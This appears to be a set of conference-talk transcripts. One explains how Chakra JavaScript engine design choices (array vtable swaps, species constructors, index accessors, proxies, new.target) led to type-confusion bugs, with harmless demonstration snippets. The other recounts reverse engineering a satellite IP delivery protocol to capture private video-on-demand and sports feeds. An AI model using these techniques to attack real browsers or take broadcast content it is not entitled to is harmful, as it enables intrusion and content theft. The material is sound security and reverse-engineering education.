They very literally cast the object to bytes and then change the vtable to be something different. I found that fairly surprising, but that's what happens, and it has some interesting consequences with regard to bugs.
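As a sketch of that progression from script, the operations below are what the talk describes as triggering each internal transition; the comments reflect the talk's description of Chakra's internals, which is not behaviour you can observe directly from JavaScript.

  let a = [1, 2, 3];            // starts life as an integer array
  a[0] = 1.5;                   // a float shows up: becomes a float array (elements twice as wide)
  a[1] = {};                    // an object shows up: becomes a var array holding pointers
  Object.defineProperty(a, '2', { writable: false });  // per-element attributes: the ES5 array form, vtable swapped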
And most of browsers do something like this. This is exactly what Chakra does, which is you start off with like a very small, not complex array and then as you add new features to it, it becomes a more complex object. So in Chakra, you start off, you just have integers in your array and then you're an integer array. As soon as you get a float added to you, you become a float array and that has to be twice as long because there's eight bytes in an array. And then if you add an object to it, it then becomes a var array and that means instead of having numbers in the array, you have pointers to objects. And then the very final stage of an array, which doesn't happen very often, is what if you configure a property to an array? What if you make one element of the array read only? Then you have to actually have a structure with the property of every element in it and that's what they call an ES5 array. And how do they implement this? They actually swap out the vtable. They very literally cast the object to bytes and then change the vtable to be something different. And I found that fairly surprising, but that's what happens. And it has some interesting consequences with regards to bugs. So to give an idea of how this works, you have your inter-array and the way arrays are structured. And this is actually a fairly elegant design. Every array is an array object and then it has a head that points to a segment of the array and then the segment has like where it starts and its data in it and that sort of thing. So another thing to note about this is a lot of browsers have a concept of a sparse array and a dense array and Chakra doesn't really have that. Basically your dense array is just a very, very small sparse array and then if it becomes sparse, they can just add more segments. So if you change the type, let's say you added a float to this, it changes its type, it swaps out the vtable and then it goes down this chain and for every segment it will allocate it so it's now twice the size and put in the things as floats and then move on. So to give an example of how these two things combine to cause bugs, there's this bug which is an array dot filter and there's a similar one in array dot map. So to show how this works in the script engine first, you start off and you want to do this method which basically it runs a function on every item in an array and then if this function you provided returns true, it goes into the new array, otherwise it does not go into that array. So you start off, you have to create the array and realize this is a constructor you provide, it can be anything and then it does the call on every single one and then it calls this direct set item at function and that's kind of where the problem is. This one's actually only defined for the variable arrays and none of the other array types so if you call it it's type confusion and the mistake here is that the developer assumed that when you're creating the new array it would be an object array because that's what by default the constructor does but you can override it and then that will cause type confusion and here's what this looks like in JavaScript. Starting at the bottom you create the array and then you redefine in the middle the species that and that's what returns dummy which is a constructor that actually makes your array. 
Another property of JavaScript I read about, this is like absolutely wild but you can put interceptors, getters and setters on the index of an array and this has all sorts of interesting impacts like here's how it works. You have your array and then you call object up to find property and you add a getter and a setter to this array and then if you change it it will call this getter and setter and what's even kind of weird is quite often if you use like internal properties of an array like let's say you call array.push on that it will still trigger this access and that can do all sorts of things that the developer wasn't expecting and this gets even more interesting if you look at how objects work in JavaScript. So every object it has its class hierarchy and this is defined by the prototype so you go you start off let's say you're trying to get a property like property one you'll go and I see if it's in the array object if it's not you get the prototype and if it's not there you get the prototypes prototype and you go all the way up the chain until it's null and that's how you get a property. So let's say you define the property of not the array but the prototype object that is given to all arrays then you that also works and then you create these arrays after you've done that and without ever touching the array it will still trigger these M accessors. Now it's not perfect because if you initialize the array like in B it doesn't work but if you are creating an empty array and then putting stuff into it and you can actually intercept this before you've ever touched the array and what's cool about that is if it's done in a native method in the engine quite often you it will call the setter and you can get a handle to that array before it's even been returned to you which can cause bugs. Here's an example of a bug caused by this and also the array typing so it's pretty simple this is array.toString which is also called array.join and you just basically cycles through every element in the array and then converts it to a string so it does this and it tries to get it and this is actually a templated function so it will call in and then it will try and convert the item which can execute script and then that can actually do the thing where it swaps the vtable out and at that point it's too late right? You're in a templated function and it's not going to like go back and change you to have the right template so then everything you do after that is on the wrong type and it's type confusion and here's an example of the code that causes this notice that you're like actually putting the getter and setter on the index so that's the thing that triggers the code that can change the array type. Another interesting JavaScript property is the proxy and this is basically you know what if you know you're not satisfied with using other things to debug JavaScript you want to debug JavaScript in JavaScript. Well then you need to have this function called a proxy and that can intercept everything that you do to an object. 
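To make those index accessors concrete before moving on to proxies, here is a small sketch; the logged messages are just for demonstration.

  let a = [1, 2, 3];
  Object.defineProperty(a, '1', {
    get: function ()  { console.log('index 1 read');  return 7; },
    set: function (v) { console.log('index 1 written: ' + v); }
  });
  a[1];          // runs the getter
  a.join(',');   // native methods that read element 1 hit the getter too

  // The same trick on Array.prototype catches indexes of arrays that were
  // created empty and filled later, before the element exists on the array itself.
  Object.defineProperty(Array.prototype, '0', {
    configurable: true,
    get: function ()  { console.log('prototype getter'); return 'x'; },
    set: function (v) { console.log('prototype setter: ' + v); }
  });
  let b = [];
  b[0];                         // falls through to the prototype accessor
  delete Array.prototype[0];    // clean up the prototype accessor afterwards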
I'd encourage you to read the spec for this; it's very full-featured. You can make it execute code if you call the constructor, if you get a property, if you get the property definition; there's just a very, very large number of things that you can intercept using this mechanism, and it causes a number of problems in browsers. There were also issues in Flash due to this. Basically, because this is supported, every single operation that handles an object in JavaScript has to consider the possibility that the call could be intercepted, and that's a hard thing to always have on your mind, so there are always mistakes due to not realizing that an object could be a proxy. Here's one that happened in Chakra. One of the interceptors you can put on a proxy is the prototype. Remember how I showed the prototype chain: if you have a proxy at one point in the chain, getting the next prototype calls a method on the proxy, and that method returns the next prototype. This is unfortunate because in Chakra, and actually most engines I've looked at, they perform a check when setting a prototype (it can be certain things, it can't be certain things), and even more, sometimes you want to do things to an object to make it perform better as a prototype: make it a certain type, remove certain optimizations, that sort of thing. This doesn't happen if you have a proxy giving back the prototype. So in this case, this is a function that does an internal fill from the prototypes: if you for example sort an array, you want to get all the elements out of the prototype first before you sort it, otherwise the sort becomes more complex. So before it calls sort, it will use this function to get all the properties of the prototype and put them into the main array before sorting it. You can see at the bottom it gets the prototype, and it made the assumption that the prototype is of a certain type, that it is a var array, because normally when you set the prototype of an array it makes sure that it's a var array. But in this case the proxy violates that assumption, and it's once again type confusion due to this DirectSetItemAt, which only works on certain array types, which is not guaranteed to be the case. And this is the code here, just to show how this works: you create the proxy with the handler, and it has the prototype intercepted at the top. Another fun feature of JavaScript is new.target. It's another kind of weird property; it can be used for subclassing, but you can also just use it with Reflect to create any object you want with any prototype you want. It's not that frequently used, but what's interesting is how they implemented it in Chakra: if you have new.target on a function, it's just an extra parameter, so they'll push the extra parameter on the stack, increment the argument count, and set a flag. Which was great, but unfortunately another call also did this for something different. So this was a really fun bug: basically, if you create a proxy which does new.target on eval, you'll get type confusion, because eval can also get an extra argument for another reason. I really liked this bug because you could tweet it; if you put a proxy on eval, it's a fairly bad type confusion. And this is, I'd say, also a case of untested code. A lot of the other stuff I've shown you is kind of weird JavaScript; this is something you absolutely should be able to do if you're going to write your JavaScript debugger in JavaScript, and I
guess just no one ever tried it. And then there's this last bug. Not every bug is due to weird JavaScript features; sometimes mistakes happen. There was this one where the assert at the bottom, I think, was meant to be some sort of hard error, but it wasn't. So this is just a simple uninitialized variable: if you have one, two or three args it does the right thing; if you have more args it just falls through and doesn't initialize it. This was also wonderfully tweetable, a very easy bug to reproduce. So that's it. I think from doing this I learned a lot about how ECMAScript implementation choices lead to bugs. There are lots of things in JavaScript that are very unusual and not very widely used in webpages, and they can lead to a large number of bugs. So if you're doing this yourself, learn about these underused features, especially the ones that add extra points where script execution can be triggered, and I think you'll find a lot more bugs. And then I'm going to end with a bit of a call to join the party: few people have been working on Chakra, not very many yet, so I'd encourage everyone, if you thought these bugs were cool, to try your hand at it. I bet there's a lot more bugs to be found. And that's it. Thanks a lot, and if anyone has any questions they can ask them
|
Microsoft Chakra is the new JavaScript engine on the block, and the bugs are pouring in. This presentation discusses techniques for finding bugs in a ‘fresh’ ECMAScript engine. When standards are implemented, design decisions are made that can affect security for years to come. This talk describes some of the implementation details of Chakra and how they led to specific bugs, as well as some ideas for finding future bugs. Recommended for people who want to find more or better browser bugs!
|
10.5446/32381 (DOI)
|
All right. My name is Taylor Jacob and I'm here to discuss a satellite-based IP protocol that I reverse engineered a couple of years ago. This protocol is used all over North America to distribute news media, video on demand, films to movie theaters, and digital signage files, amongst other more mundane uses. There are many different protocols that operate on the same principles as what I will discuss today. I can't speak to the prevalence of these same or similar systems being used in Europe, but based on the vendor websites, I suspect there are similar systems used across the globe, not limited to just North and South America. So I need to start with a little bit of background to make sure we're all on the same page. Although there are many types of satellites circling the Earth, this presentation deals specifically with the most commonly known type, geostationary satellites. These satellites are well suited for distributing a variety of information from a single source to a large geographic area. They are commonly known for TV content, but the setup is also well suited for other types of media distribution. There's typically no return path in this sort of delivery network, and that sort of setup is okay: if you're watching TV, it's not important that you tell the station you're watching, and if you're receiving media files, they generally won't be needed within seconds of delivery; usually they position the data days beforehand. My hardware setup was pretty basic. I used some standard C-band dishes, which you see there, a PCI DVB-S card, and just a Linux x86 PC. For software I used all open source: dvbsnoop, which is a transport stream analyzing tool; the regular Linux DVB tools, like szap to tune and dvbtraffic to do some in-depth analysis of the PIDs on the transport; and the standard UNIX tools, grep, sort, uniq and other text-based tools. At some point I had to start writing my own software to get deeper into it. Before I dive in, I want to briefly cover some technical aspects of the satellite systems and the video formats. DVB is the most prevalent digital video broadcasting standard in the world. There are three main types: DVB-T for terrestrial, DVB-C for cable television, and DVB-S for satellite. There are newer versions, DVB-S2, T2, and C2. Although the V in DVB would indicate that it's for video, it can also carry any other type of digital content; in the case of this presentation specifically, IP traffic. The main difference between DVB-T, C, and S is the transmission medium: for T it's the air, for C it's copper cable, and for S it's the earth's atmosphere. The physical interface is generally referred to as a mux in all three DVB flavors; in the case of DVB-S it's also referred to, rather erroneously, as a transponder. Once the signals are demodulated into a bit stream, they're virtually identical, and the standard way this data is moved is the MPEG transport stream, also called TS for short. The format is relatively simple: 188-byte packets that have a simple four-byte header. All you really need to know for this presentation is that it starts with 47 hex, and there's a 13-bit field called the packet identifier, more commonly known as the PID. So on the transport stream there are 8191 available PIDs, and of all of them, only a fraction will be used simultaneously. Each PID will carry a specific type of traffic.
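As a concrete illustration of that four-byte header, here is a minimal C sketch that checks the 0x47 sync byte and extracts the 13-bit PID from a 188-byte packet. This is just the standard MPEG-TS layout, not code from the talk.

    #include <stdint.h>
    #include <stdio.h>

    #define TS_PACKET_SIZE 188
    #define TS_SYNC_BYTE   0x47

    /* Extract the 13-bit PID from a single 188-byte TS packet.
     * Returns -1 if the sync byte is missing. */
    static int ts_pid(const uint8_t *pkt)
    {
        if (pkt[0] != TS_SYNC_BYTE)
            return -1;
        return ((pkt[1] & 0x1F) << 8) | pkt[2];
    }

    int main(void)
    {
        uint8_t pkt[TS_PACKET_SIZE] = { 0x47, 0x1F, 0xFF, 0x10 }; /* null packet */
        printf("PID = 0x%04X\n", ts_pid(pkt));
        return 0;
    }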
It can be a single video stream, audio stream, program metadata, or other data traffic. The PIDs are how a set-top box or other component can filter out the content not relevant to its operation. For example, a digital video channel will be made up of a few PIDs: generally you will have one PID used for the video stream, another for the audio track, and potentially others for subtitles or captions, or whatever you call them in Europe; that's what we call them in North America. So the set-top box would filter those specific PIDs and ignore everything else. As far as encryption, DVB encryption runs on that 184-byte payload, the generic payload bytes there in my diagram. The second part I need to cover is the packetized elementary stream and PSI data. PES is the format that defines how elementary stream data, which is generally audio or video, is carried in the transport stream. The elementary stream is packetized in sequential order and the PES packets are sent on a PID. The format of the video or audio codec isn't defined by it and has typically changed over time: historically the video would have been MPEG-2, now it's H.264, and it's migrating to HEVC. The important part you need to know is that a packetized elementary stream packet always starts with a 00 00 01 sequence in hex. The other type of payload, PSI, is most commonly used to describe the layout of a transport stream, meaning how it's configured, what TV channels are available, and what PIDs the video and audio streams can be found on. But there are many other types of PSI data that allow different standards to ride on top of the transport stream and define what is necessary for their application. Now, the DVB Multiprotocol Encapsulation (MPE) standard is the one that pertains to this presentation. It defines the means to carry IP traffic over the transport stream. The key parts are: one or more PIDs can carry DVB MPE traffic, and all the PIDs operate independently of each other. Each PID's DVB MPE stream may contain more than one destination IP. The intention is to take the IP packets from one PID and put them on an Ethernet network somewhere once they're decoded. In North America I encountered very little unencrypted unicast IP traffic, but I did see it here and there. The vast majority of the IP traffic I encountered is multicast UDP, since the satellite link is usually single-directional. So, a little bit of the background. I've always enjoyed scanning satellites for news events, feeds, sports events, etc. Although there's a lot of programming available for subscription, it's always been fun to see what you aren't supposed to see. When scanning signals with a satellite set-top box, looking for these hidden channels, it's common to run into lots that are encrypted. It's also common to find a transponder, or transport stream, that has no programs on it. What you can see here is a set-top box doing a blind scan. So anyway, these transponders that have no programs and aren't encrypted or anything obviously have some purpose, but it's not carrying television traffic. Many times they'll be satellite-based internet services, but not always. For years I always wondered what they were, but I never did much investigation, assuming it was just encrypted internet traffic. But at some point, seven or eight years ago, I saw hints here and there on some forums that there were TV channels on these unknown transponders.
They were calling it IPTV. Unfortunately all these signals were on C-band, and I didn't have a C-band dish at the time. So I set out to find a C-band dish and start examining these signals with a Linux PC. I've always had a PC around with a DVB-S card, so examining them was just a matter of sitting down and poking around once I managed to find a suitable dish and get it installed. Once I acquired my first C-band dish, I installed it and started taking notes on these empty transponders. The process I would use to examine these empty transponders, once I found them with the set-top box, was to see what PIDs were present. Once I knew what PIDs were present, I'd start identifying them. At first I didn't really know what I was looking for, but if it was unencrypted and not a regular PES stream, I was interested. One of the tools I used to identify what PIDs were present was dvbtraffic. It's part of the standard Linux DVB tools; it operates by checking every packet in the transport stream over a second and counting what PIDs are present and their bandwidth. You can see some output here. The capture on the right is from a regular TV mux, and you can see there are a lot of different PIDs at various bit rates. The one on the left is what I'm calling an empty mux, which has one PID with, as you can see, almost 72 megabits of data just sitting there. Once I'd identified one of these PIDs with lots of traffic, I'd start to look at it in dvbsnoop, which allows you to examine, in really fine detail, whatever content is on a particular PID. So I'd use dvbsnoop on a PID after I'd identified it with dvbtraffic. After a quick glance, you can see what kind of traffic is being carried. If you look at this example here (I cut out a lot, because it would have been 30 screens worth of data), you can see it's IP traffic, and in red you can see the IP and the destination port. So I've definitely got some sort of UDP traffic here. A lot of this process I'm describing was done manually, but eventually I programmed it up, because it was kind of boring to just write all this stuff down on paper. Anyway, dvbsnoop will provide a tremendous amount of detail about almost anything it encounters, and here's a portion of the output. Since the output is text, I was able to pipe this stuff through grep, look at what IPs were present, get other statistics, and figure out what I was looking at. At first I wasn't really sure what I was looking for, but the first thing I did was to identify the IP addresses that were present. Then I started looking at the traffic on each of the IPs. I realized very quickly that the unicast traffic I did encounter wasn't very interesting; multicast was a completely different story. So looking at a dump of the UDP packets, you can see here that I've highlighted the 47s, which are spaced 188 bytes apart, and in blue, which I guess you can't see very well, there are a bunch of the PES start sequences. So it's really obvious in this packet that there's some sort of video and some sort of transport stream, but how to get it out I didn't really know at the time. By this point I'd reached the end of the greppable part of my investigation, so I threw together some very basic code to capture the IP packets and manipulate them.
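The kind of check that makes an embedded transport stream obvious inside a UDP payload, 0x47 sync bytes spaced exactly 188 bytes apart, might look like this in C. This is my own illustration, not the speaker's capture code.

    #include <stdint.h>
    #include <stddef.h>

    /* Heuristic: does this UDP payload look like it carries MPEG-TS packets
     * starting at the given offset?  Require at least three 0x47 sync bytes
     * spaced exactly 188 bytes apart. */
    static int looks_like_ts(const uint8_t *buf, size_t len, size_t off)
    {
        int hits = 0;
        for (size_t p = off; p < len; p += 188) {
            if (buf[p] != 0x47)
                return 0;
            hits++;
        }
        return hits >= 3;
    }

    /* Try every possible starting offset, e.g. to discover a prepended header. */
    static long find_ts_offset(const uint8_t *buf, size_t len)
    {
        for (size_t off = 0; off + 188 * 3 <= len; off++)
            if (looks_like_ts(buf, len, off))
                return (long)off;
        return -1;
    }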
At first this little program just displayed what IPs were present on the PID. Then I started to save the payloads of certain IPs to a file, and I had my first results. The first success turned out to be linear TV channels; linear is an industry-standard term for a real-time television station. These channels were made up of a single MPEG transport stream encapsulated in UDP packets, with one channel per multicast IP. Each UDP packet would contain exactly seven transport stream packets. Two transponders on the same satellite had a large lineup of encrypted channels, but a few more were in the clear. One of these happened to be NHL Center Ice, and it stayed unencrypted for about two years. To play these channels back on a computer, I wrote a simple program to capture the UDP packets and re-encapsulate them on a different multicast IP, which I would play back in VLC; you can see a little screenshot here. After finding the encapsulated linear video, I still had no clue what the majority of the multicast IPs were. There was one multicast IP on the same transponders as NHL Center Ice that took up most of the bandwidth of a transponder. I had learned from the linear video that each multicast IP was used for a single program. If you used the same technique of saving the UDP payloads from the unknown IP to a file and tried to play them back, every now and then VLC would attempt to render a picture or start to play a short sample of audio. You can see an example here of how it would kind of start to render something, but you wouldn't really get anything, and I found examples of this type of behavior on numerous satellites. If you examined the UDP payload, you'd see all the telltale signs of MPEG transport stream and PES packets, but I couldn't figure out how to extract them. Upon closer examination, it was clear the UDP payloads had some sort of header on them. So I wrote some software to strip some number of bytes and save the rest of the UDP payload. Using the same grep technique, it wasn't difficult to determine what was the header and what was the payload. I tried this blind header-stripping technique on numerous transponders without much luck, until I tried it on a Ku-band transponder that I had tucked away in my notes. On this transponder I got lucky and managed to get some playable video. I was excited to finally get video to play without errors. It turned out to be an episode of Dr. Oz; an American daytime program wasn't exactly the most rewarding prize, but it was progress nonetheless. I still wasn't sure why my previous attempts at header stripping had not worked on the other transponders. By this point I had determined that the header in the packet was a fixed size, with a few exceptions, so I started looking at the header more specifically to see if I could understand why I had not always been able to get some sort of video to play. Much like before, I used dvbsnoop and grep to examine just the UDP packet headers in real time. Looking at the slide, you can see almost immediately that the headers have some sort of 32-bit field that is interleaved, in red, and a separate 32-bit counter, in blue, and that number would increment in each packet. I don't know if you guys can see the blue that well, but anyway. So I started to look at the different transponders in my notes, and I realized that I wasn't dealing with the same protocol, or at least not the same version of the protocol.
And I identified at least five different systems that are all almost identical in design, very similar on a technical level, but they differed nonetheless. I started to focus my efforts on the high-bandwidth C-band transponder that carried NHL Center Ice; I thought it might yield the most interesting results. From here on out, I mainly focused my effort on this transponder and the unknown protocol it was using. Going back to the slide, you can see almost all the packets start with the two bytes 00 01, and I started to speculate that the interleaved 32-bit field in the header was some sort of transmission ID. So I wrote some test code to start saving each transmission ID to a unique file, and with this basic change I was able to get video from a much larger percentage of the files. It became clear why my header stripping had previously been so hit or miss: multiple videos were being sent at the same time. I then examined the files that I couldn't play and looked at the packet headers for clues. Almost all the transmissions are sent in sequential order based on that counter, but in the examples I couldn't play, the counter wasn't in sequential order. So I realized that the counter was actually a block number in the transfer, and started saving the payload using the counter as a block offset. This cleaned up almost all the errors I was getting, and I was able to play back almost every file. So now I was able to play the majority of the files being transferred. I also noticed that the running time of the videos was significantly longer than the time it took to download them. It was only then that I realized the files were meant for playback in the future, i.e. a content delivery system. Being able to save the media files was a great achievement, but it left a lot to be desired. Every file was saved under a 32-bit number, and the only indication of what the content was required further examination, which usually meant me trying to play the file in a media player. I'd also receive the same files numerous times, with no indication that they were retransmissions. I also noticed for the first time that the end of these files always contained some seemingly random data. I had a hunch it was some sort of error correction data, but I had no way of proving it at the time. Seeing the split between the file and this extra data was pretty obvious: the random data always started on a packet boundary. I knew there were other packets in the stream that I was ignoring, and I assumed they had to be some sort of control packets; the receiving stations had to be made aware of the files and know when a transmission started or ended. I started logging all of the non-payload packets to a file, and it didn't take very long to get a basic understanding of the other types. All the packets had the same 8-byte header with a 16-bit packet type, a 16-bit packet length, and the 32-bit object ID field. After this, all the packets differed, but since all the packets used the same object ID field, I started to look at how the other packets correlated with the files I downloaded and see what I could determine. The 03 was the most prevalent packet, and it was the longest of all of them. At a quick glance you could see ASCII strings containing what seemed to be, quite obviously, filenames. I'll come back to this in a minute. The other two packets were the 06 and the FF, and they only occurred before and after a transmission.
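Putting those observations together, a demultiplexer along the lines described might be sketched like this in C. The structure layouts and field names are reconstructions for illustration, not the vendor's definitions.

    #include <stdint.h>
    #include <stdio.h>
    #include <sys/types.h>   /* off_t; fseeko is POSIX */

    /* Reconstructed data-packet header (illustrative names, not the real format). */
    struct data_hdr {
        uint32_t object_id;   /* the interleaved "transmission ID" */
        uint32_t block_num;   /* incrementing block counter        */
    };

    /* Reconstructed 8-byte control-packet header. */
    struct ctrl_hdr {
        uint16_t type;        /* 0x03 file info, 0x06 new object, 0xFF removal (guesses) */
        uint16_t length;
        uint32_t object_id;
    };

    /* Write one payload block into the per-object file at its proper offset,
     * so out-of-order blocks and retransmissions land in the right place. */
    static int store_block(FILE *f, const struct data_hdr *h,
                           const uint8_t *payload, size_t len, size_t block_size)
    {
        if (fseeko(f, (off_t)h->block_num * (off_t)block_size, SEEK_SET) != 0)
            return -1;
        return fwrite(payload, 1, len, f) == len ? 0 : -1;
    }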
Their bodies were really short, and it was soon clear that they were used to indicate when a new object ID was starting in the stream or when it was being removed. So the 03 packet, like I said I'd come back to, was the one I was looking for. It clearly contained the filename along with some other descriptive information about the file, so I started logging as many of these as I could and looking for patterns. The process I used was pretty rudimentary: I used vim and looked at packets side by side, and I piped and grepped packets through various filters to see what patterns I could discern. The first problem was that the location of the ASCII filename was not at a fixed offset into the packet, meaning I had to look more into how the packet was structured to be able to programmatically extract the filename. My goal was to identify as many parts of the 03 packet as possible so that I could see what remained. I assumed the packet was made up of little-endian 32-bit values and null-terminated strings, since there were a lot of zeros. I knew the total payload size, including the extra data, and had a good idea of the file size to within a few hundred bytes once the extra data was removed. I also knew the transmission block size, and I was able to clearly see the filename in the packet as well. I also found a date field that was usually within the past week or so, in Unix timestamp format. I may be showing my age here a little bit, but I printed out hex dumps of a couple of 03 packets for files I knew all these properties of, and highlighted them. Once I marked off all these areas, it was obvious that the fields I was interested in were all clustered together. You may not be able to see it clearly here in the photo, but there was always a 32-bit little-endian 02 right above the transmission block size, which is highlighted in yellow there. It was followed by a 32-bit little-endian length that correlated with a position 13 bytes after the filename, which was usually the end of the packet. Based on this knowledge and a little more human pattern recognition, I was able to make a parser that was token-based, starting 24 bytes into the packet. Now, this had some major flaws and it would crash fairly often, as I didn't know nearly enough about the format, but regardless, I was able to properly save the files with the correct filenames. I had some bounds checking in my parser to stop it segfaulting, and I logged the errors, and whenever I mis-parsed an 03 packet I would compare the packet that crashed it to what I was expecting. This process continued on and off for a year or two, until the parser stopped running into errors. I'm sure my parser routine isn't a facsimile of the real software, but it's been stable for four to five years now. So the two big problems at this point were dealing with the volume and the speed of the transmissions. The big video-on-demand system had two transponders that combined for a constant 150-megabit stream; I could fill up a two-terabyte hard drive in less than two days. Most of the content I was collecting I had little or no interest in watching, but I was able to filter out some of the content based on filenames. It wasn't an ideal solution and required me to manually clean up the hard drives every few days. But over the course of a month, I set up a 10-terabyte array of two-terabyte drives.
I never fully addressed the file volume problem programmatically, but with some string matching I was able to reject a large enough portion that I could sort through the files once a month or so. The overall bit rate was the most difficult problem to tackle. This was by far the most I/O-bound application I'd ever worked with. The transmissions were constant, so I needed to be able to write data at least as fast as the bit rate, because no amount of buffering would help. The 10-terabyte array was more than adequate to keep up with the data rate if I totally left it alone, but when doing other operations on the disks I'd run into problems. The first thing I tried was to increase the buffering on the DVB driver. I tried using a buffer as big as 64 megabytes, but that only covered about seven seconds; the value I'd been using before was 4 to 8 megs, so it was an improvement, but it alone didn't eliminate the problem. I can't quantitatively say how much it helped, but I still ran into problems very consistently. From watching the hard drive light, it was clear the data was being written to disk in quick spurts of a second and then a pause for a few seconds. I started to look at the disk using vmstat, and you could also see the burstiness. You can see that here in the slide at the top, in the blocks-out field in red: it's writing nothing, then writing 45,144, and then nothing. I'll explain in a second. So I did some research and found the kernel settings that control how much I/O data is cached in memory until it's flushed to disk. There's a pair of settings in the kernel, vm.dirty_background_bytes and vm.dirty_background_ratio, and what this setting does is place either a byte limit or a ratio on the amount of dirty data held in the cache before flushing it to disk. The box I was using had 8 gigs of RAM, and the default setting for the kernel I was using was 10%. This box wasn't using much RAM for applications, so to be conservative, say 4 gigs were available for caching: a write wouldn't get flushed to disk until approximately 400 megs needed to be flushed. At 150 megabits, a rough estimate is that it would take around 20 seconds to add 400 megs to the buffer. The problem was that the buffers would still be filling while the data was being written out, and that's why the bursts were so closely spaced. The real problem can be seen in the upper vmstat's wa field: this is the percentage of time that I/O operations are suspended, and where buffer overruns could occur if everything in my application had to stop and wait. Basically it means that everything is waiting for that I/O to happen; in the last row there, highlighted in yellow, for 17% of that one second everything is just paused. To stop this behavior, I changed the vm.dirty_background setting to zero, which meant that the data was written to disk as soon as it expired. This immediately changed the disk access behavior to be much smoother, and data was written out continuously as it was received, instead of being so bursty. It also meant the potential spikes in I/O blocking were reduced significantly. You can see this improvement in the lower vmstat output; it's writing a consistent 8,000 or so in each sample. So after tweaking the vm.dirty settings, my client was able to write data reasonably well, but I still ran into problems doing other file system manipulations, very specifically deleting a file.
Up until this point I was just using the ext4 file system, which is the default with Linux; I'd never had any reason to use anything else, as it met my needs. I started researching file deletion times, and the larger a file is on ext4, the longer it takes to delete, due to the inodes being fragmented. I had done some work on MythTV years before, and I remembered the hardcore users recommended something other than ext4, but I couldn't remember why. It turns out it was the long deletion times causing I/O issues. I did a little more research and started trying various file systems, and I ended up settling on XFS. The two main reasons were that you can control how large a chunk of the disk is allocated at a time, and that the file deletion time was always a fraction of a second regardless of how large the file was. The large block allocation was also very useful, since almost every file downloaded was multiple gigs; I set that value to one gig. There are some XFS tools to see how many non-contiguous blocks a file takes up, and with the one-gig setting, even really large files on the order of 20 gigs or more are still only split up into a few pieces. So by this point I was able to store just about every media file from the video-on-demand distribution system. I still had problems here and there due to reception issues, but overall I was able to complete 95% or more of the files, and buffer overruns due to I/O were a thing of the past. Although I was quite pleased with being able to store and organize the files, due to the nature of satellite transmission I would quite regularly be missing a few packets from transmissions, and it was quite frustrating to be missing one or two packets from a 20-gig movie. So eventually I decided that I should take a look at the FEC. Up to that point I didn't understand much about FEC, aside from the high-level idea that it protects data using some fancy math I didn't understand. At some point I had found the vendor's website, and it mentioned using a proprietary FEC method. So I started to do some research on FEC, and I started looking at the files I was downloading for any clues I could use to focus my energy. I knew the FEC data always fit exactly into the packets, and I knew there was no padding; there was no padding on the FEC data like there was on the actual file. This led me to believe that it was block based. I also noticed the ratio of FEC data had a close correlation to the size of the file being transmitted. I started examining other systems that used the same protocol, and I noticed this ratio differed a little on different systems: C-band tended to use less redundancy than Ku-band, most likely because C-band is less sensitive to interference and signal loss than Ku-band. One of the more important observations I happened to make is that a single-packet transmission's FEC was an exact copy of the payload. This slide is an example of a two-packet file that was 2,600 total bytes; you can see the contents are the same at byte 0 and at byte 1300. Up until this point I had been mostly overwhelmed, not knowing where to start, because I had focused my energy on the large files for some reason. So I started examining the smaller transmissions and collecting samples of two-, three-, and four-packet transfers. At some point during my research I had also done patent searches and come across some potentially useful FEC schemes, but I hadn't been able to make sense of them.
I eventually went back to those patent documents and started trying to piece together how it all worked. It was this mundane patent search that actually proved to be the breakthrough I needed; I just didn't know the answer had been sitting under my nose the whole time. From this point on I started researching all the math mentioned in the patent and trying to remember how matrix math worked. I had to learn all about finite field math, Galois fields, and matrix math. Over the course of a few weeks and many sheets of paper, I managed to calculate the FEC of some small file examples by hand. I don't want to turn this into a long math lesson, but I want to walk through a high-level overview of how the math works for the FEC system. A key part of the forward error correction is Galois field arithmetic. A Galois field has two important properties. The first is that it's a set of integers where the math operations (addition, subtraction, multiplication, and division) between integers in the set produce another integer in the set. The second property is that the field is finite. The FEC scheme I'm speaking of, and in fact most others, is a set of algebraic equations used to calculate the missing elements from the others. Performing the math operations in a Galois field is different from standard math: addition and subtraction are just XOR, and multiplication and division are a bit more complicated, but the total set of possibilities for a 2^8 field or smaller can easily be handled in a computer with a lookup table. All the Galois field math is done using a primitive polynomial, one not reducible by any other polynomial. In the case of the 2^8 Galois field, the polynomial is represented by the x^8 equation there at the bottom; it's the same polynomial used for QR codes, Reed-Solomon, and lots of other error correction schemes. The FEC method employed here, I found out later, is called the Vandermonde FEC method. It consists of the basic equation y_k = x_n * G, where y_k is the transmitted code word (all the packets including the FEC data), x_n is the original data, and G is an n-by-k generator matrix. You can get back x_n with the following equation: x_n = z_n * A^-1, where z_n is the received code word and A^-1 is the repair matrix, which is based on your generator matrix. You have to have at least n elements of z to be able to recreate x. So the whole principle of the FEC system is that you have a system of k equations in n variables; if you have at least n pieces, you can solve for the missing values. So what does all that mean in a real-world implementation? Well, let's roll up our sleeves and do some matrix math. As an example, I'll do a demonstration of a 2-by-3 FEC scheme. This means there are two bytes that we want to protect using three bytes. It's a small enough example that we can do it quickly, and yet the whole process can be understood. The first step is to build a generator matrix. For this example it'll be a 2-by-3 Vandermonde matrix, and this is the equation right here; basically it's just a simple geometric progression. The 2-by-3 Vandermonde matrix for the 2^8 Galois field is figure 5, but this isn't the generator matrix yet. To create the generator matrix, we need to get it to standard form by reducing it. I'm not going to get into this, but that's what figure 6 is right there.
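Gathering the relations he describes into one place; the notation here is my reconstruction from the spoken description, not a transcription of the slides.

    % Reconstruction of the encode/decode relations described above (notation mine)
    \[
      p(x) = x^8 + x^4 + x^3 + x^2 + 1
      \qquad \text{(0x11D, the polynomial also used by QR codes and Reed-Solomon)}
    \]
    \[
      \mathbf{y} = \mathbf{x}\, G, \qquad G = \bigl[\, I_n \mid P \,\bigr] \in \mathrm{GF}(2^8)^{\,n \times k}
    \]
    \[
      \mathbf{x} = \mathbf{z}\, A^{-1}
    \]
    % x: the n original data symbols, y: the k transmitted code symbols,
    % z: any n received symbols of y, A: the n-by-n submatrix of G built
    % from the columns corresponding to those received symbols.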
